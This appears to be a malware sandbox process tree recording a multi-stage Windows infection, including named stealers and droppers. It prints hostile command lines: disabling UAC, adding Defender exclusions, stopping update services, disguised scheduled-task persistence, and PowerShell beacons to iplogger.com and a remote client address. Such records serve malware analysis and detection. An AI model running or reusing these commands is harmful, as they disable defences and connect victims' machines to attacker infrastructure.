--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=8A3F17671C88CC150419FAFC8500DACB --renderer-client-id=6 --mojo-platform-channel-handle=1004 --allow-no-sandbox-job /prefetch:1
5⤵
PID:9968

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3F95AAD9D8D16796EA8E60FDA43FDCFC --mojo-platform-channel-handle=2184 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:9368

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:9136

C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
C:\Users\Admin\AppData\Local\Temp\a\quoteezx.exe
3⤵
PID:6728

C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
4⤵
PID:8316

C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Modifies registry key
PID:8436

C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe
"C:\Users\Admin\AppData\Roaming\Explorers\Explorers.exe"
4⤵
PID:4692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
5⤵
PID:1984

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
2⤵
PID:8604

C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\govonorzx.exe"
3⤵
PID:9024

C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe
"C:\Users\Admin\AppData\Local\Temp\a\360TS_Setup_Mini_WW.Marketator.CPI20230401_6.6.0.1054.exe"
2⤵
PID:8988

C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe
"C:\Users\Admin\AppData\Local\Temp\a\shedume2.1.exe"
2⤵
PID:7824

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe" C:\Users\Admin\AppData\Local\Temp\tzehxhtbqdr.f
3⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\onzqy.exe
"C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
4⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe
"C:\Users\Admin\AppData\Local\Temp\a\MicOSOFTSearchProtocolHosb66.exe"
2⤵
PID:8716

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rundll32.exe
3⤵
- Kills process with taskkill
PID:9168

\??\c:\dan.exe
c:\dan.exe
3⤵
PID:9208

C:\Users\Admin\AppData\Local\Temp\a\build_2.exe
"C:\Users\Admin\AppData\Local\Temp\a\build_2.exe"
2⤵
PID:2652

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Executes dropped EXE
PID:1876

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
PID:6248

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
3⤵
PID:5160

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\explorer"
3⤵
PID:3556

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\explorer\explorer.exe'" /f
3⤵
PID:7324

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\explorer\explorer.exe'" /f
4⤵
- Creates scheduled task(s)
PID:7436

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C copy "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe" "C:\Users\Admin\AppData\Roaming\explorer\explorer.exe"
3⤵
PID:5288

C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (10).exe"
2⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\a\vbc (11).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (11).exe"
2⤵
PID:8880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:3920

C:\Users\Admin\AppData\Local\Temp\a\vbc (12).exe
"C:\Users\Admin\AppData\Local\Temp\a\vbc (12).exe"
2⤵
PID:7352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:3632

C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
"C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
2⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\a\networksec.exe
"C:\Users\Admin\AppData\Local\Temp\a\networksec.exe"
3⤵
PID:10152

C:\Users\Admin\AppData\Local\Temp\a\4k4wuzs.exe
"C:\Users\Admin\AppData\Local\Temp\a\4k4wuzs.exe"
2⤵
PID:6968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:8988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
3⤵
PID:9084

C:\Users\Admin\AppData\Local\Temp\a\Butterfly_On_Desktop.exe
"C:\Users\Admin\AppData\Local\Temp\a\Butterfly_On_Desktop.exe"
2⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ruzvelt.exe"
2⤵
PID:6364

C:\Users\Admin\AppData\Local\Temp\a\build2.exe
"C:\Users\Admin\AppData\Local\Temp\a\build2.exe"
2⤵
PID:6700

C:\Users\Admin\AppData\Local\Temp\a\build2.exe
"C:\Users\Admin\AppData\Local\Temp\a\build2.exe"
3⤵
PID:8132

C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe
"C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe"
2⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe
"C:\Users\Admin\AppData\Local\Temp\a\2-1_2023-04-14_08-31.exe"
3⤵
PID:9076

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
2⤵
PID:8112

C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe
"C:\Users\Admin\AppData\Local\Temp\a\secatlaszx.exe"
3⤵
PID:4500

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
2⤵
PID:8028

C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
3⤵
PID:8040

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
2⤵
PID:8400

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
3⤵
PID:7236

C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
3⤵
PID:6648

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
2⤵
PID:6184

C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:8540

C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
2⤵
PID:7456

C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe
"C:\Users\Admin\AppData\Local\Temp\a\nnannazx.exe"
3⤵
PID:8468

C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
2⤵
PID:8820

C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
3⤵
PID:8652

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
2⤵
PID:8612

C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\kmkzx.exe"
3⤵
PID:9704

C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\johnzx.exe"
2⤵
PID:8904

C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\pumkinzx.exe"
2⤵
PID:6280

C:\Users\Admin\AppData\Local\Temp\a\NewM.exe
"C:\Users\Admin\AppData\Local\Temp\a\NewM.exe"
2⤵
PID:5496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\a\NewM.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
3⤵
PID:9992

C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
2⤵
PID:7620

C:\Users\Admin\AppData\Local\Temp\a\ghostworker.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghostworker.exe"
2⤵
PID:8172

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "ghostworker.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\ghostworker.exe
"ghostworker.exe"
4⤵
PID:6432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
"Yosdofwiqay.exe"
4⤵
PID:9892

C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe
"C:\Users\Admin\AppData\Local\Temp\a\Togwcstgxg.exe"
2⤵
PID:4352

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "Togwcstgxg.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:10168

C:\Users\Admin\AppData\Local\Temp\Togwcstgxg.exe
"Togwcstgxg.exe"
4⤵
PID:9532

C:\Users\Admin\AppData\Local\Temp\Yosdofwiqay.exe
"Yosdofwiqay.exe"
4⤵
PID:6592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
4⤵
PID:7684

C:\Users\Admin\AppData\Local\Temp\a\Prynt_Stealer_5.6.exe
"C:\Users\Admin\AppData\Local\Temp\a\Prynt_Stealer_5.6.exe"
2⤵
PID:9948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9948 -s 1000
3⤵
- Program crash
PID:68

C:\Users\Admin\AppData\Local\Temp\a\virus.exe
"C:\Users\Admin\AppData\Local\Temp\a\virus.exe"
2⤵
PID:9448

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "build.exe" & start "" "Yosdofwiqay.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.com/1wjx55"
3⤵
PID:10112

C:\Users\Admin\AppData\Local\Temp\build.exe
"build.exe"
4⤵
PID:7664

C:\Users\Admin\AppData\Local\Temp\a\Installs.exe
"C:\Users\Admin\AppData\Local\Temp\a\Installs.exe"
2⤵
PID:9288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE
3⤵
PID:5128

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
3⤵
PID:10120

C:\Users\Admin\AppData\Local\Temp\a\hastly.exe
"C:\Users\Admin\AppData\Local\Temp\a\hastly.exe"
2⤵
PID:9612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 592
3⤵
- Program crash
PID:5776

C:\Users\Admin\AppData\Local\Temp\a\Output.exe
"C:\Users\Admin\AppData\Local\Temp\a\Output.exe"
2⤵
PID:9628

C:\Users\Admin\AppData\Local\Temp\a\ts.exe
"C:\Users\Admin\AppData\Local\Temp\a\ts.exe"
2⤵
PID:5804

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
1⤵
PID:4564

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
2⤵
PID:1348

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1348 -s 120
3⤵
- Program crash
PID:6124

C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
1⤵
PID:4356

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2⤵
PID:5368

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:4020

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4020 -s 368
2⤵
- Program crash
PID:5944

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:5904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3180

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6824

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:5148

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:8028

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:7744

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:7572

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:2944

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:6244

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6344

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:6600

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7460

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7352

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:5576

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:2648

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:8224

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:1984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bysta#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7524

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:7432

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:6392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:6396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9008

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:4128

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\caa77f632416470cbcb9f6aafcfa3f72 /t 0 /p 9008
1⤵
PID:7364

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8860

C:\Windows\SysWOW64\raserver.exe
"C:\Windows\SysWOW64\raserver.exe"
2⤵
PID:1628

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5796

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
2⤵
PID:4372

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
3⤵
PID:10052

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6420

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7360

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9156

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6392

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6616

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\4CC0.exe
C:\Users\Admin\AppData\Local\Temp\4CC0.exe
1⤵
PID:8540

C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
"C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
2⤵
PID:3412

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
3⤵
PID:5808

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5060

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6824

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3684

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
1⤵
PID:7956

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
2⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:4972

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6332

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4912

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:9056

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
1⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2⤵
PID:7296

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:5132

C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
1⤵
PID:5776

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:8624

C:\Windows\SysWOW64\systray.exe
"C:\Windows\SysWOW64\systray.exe"
1⤵
PID:5620

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:6648

C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer\explorer.exe
1⤵
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 380
2⤵
- Program crash
PID:9296

C:\Users\Admin\AppData\Roaming\vtetrtu
C:\Users\Admin\AppData\Roaming\vtetrtu
1⤵
PID:6932

C:\Users\Admin\AppData\Roaming\auetrtu
C:\Users\Admin\AppData\Roaming\auetrtu
1⤵
PID:8948

C:\Users\Admin\AppData\Roaming\fietrtu
C:\Users\Admin\AppData\Roaming\fietrtu
1⤵
PID:8868

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3592

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6512

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6164

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7464

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7260

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8524

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5380

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:7952

C:\Windows\SysWOW64\NETSTAT.EXE
"C:\Windows\SysWOW64\NETSTAT.EXE"
1⤵
- Gathers network information
PID:4652

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
2⤵
PID:9936

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:4028

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
2⤵
PID:9516

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:9668

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:9916

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:9428

C:\Windows\SysWOW64\control.exe
"C:\Windows\SysWOW64\control.exe"
1⤵
PID:6344

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:5412

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:10076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
